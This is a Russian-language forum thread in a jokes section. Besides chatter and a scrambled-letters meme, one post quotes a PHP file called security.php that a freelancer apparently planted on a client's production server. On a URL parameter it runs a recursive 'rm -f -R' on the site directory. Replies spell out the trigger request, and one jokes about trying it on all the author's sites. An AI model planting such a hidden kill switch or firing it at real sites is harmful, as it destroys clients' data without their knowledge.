Папка «Приколы»
828 повідомлень
10571 повідомлення
#12 років тому

Я мщу и месть моя страшна. Это у нас тут приколы... Мне всегда интересно, почему на Форумах пишут друг о друге гадости разные. Интересно, может люди эти и на работе на стенах офиса пишут друг про друга ?
828 повідомлень
828 повідомлень
#12 років тому
Бывает
1 повідомлення
#12 років тому
По рзелульаттам илссеовадний одонго анлигйсокго унвиертисета, не иеемт занчнеия, в кокам пряокде рсапожолены бкувы в солве. Галвоне, чотбы преавя и пслоендяя бквуы блыи на мсете
10571 повідомлення
#12 років тому
IIIEPXAH, Да вообще неважно какие ошибки и как написано, все понятно
6863 повідомлення
#12 років тому
Цитата:
<?php
$param = $_GET;
if($param=='nahui')
{
$dir = __DIR__;
shell_exec("rm -f -R ".$_SERVER);
}
?>
Фрилансер защищает себя от неплатежеспособного заказчика xD
Файл лежал на продакшин сервере около года, название файла - security.php
935 повідомлень
#12 років тому
Я так понял, в админке он сделал какую-то опцию с названием 'delaem' и одним из значений там 'nahui' и после сохранения такого выбора файлы системы очищаются?
6863 повідомлення
#12 років тому
radar0080, зачем админка? В адресной строке все пишется. Подразумевается, что доступа к сайту у автора больше нет.
778 повідомлень
#12 років тому
Цитата ("radar0080"):Я так понял, в админке он сделал какую-то опцию с названием 'delaem' и одним из значений там 'nahui' и после сохранения такого выбора файлы системы очищаются?
Я думаю он просто выполняет HTTP-запрос security.php?delaem=nahui в случае чего.
278 повідомлень
#12 років тому
Осталось только просмотреть портфолио автора и потестить этот запрос на всех его сайтах :idea:
3002 повідомлення
#12 років тому
AlexsimA, Выслать белый фон заказчику и сказать, что все по тз... 
1617 повідомлень
#12 років тому
AlexsimA, напишут и обижаються потом, что не так сделали, как он думал хотеть :P
1461 повідомлення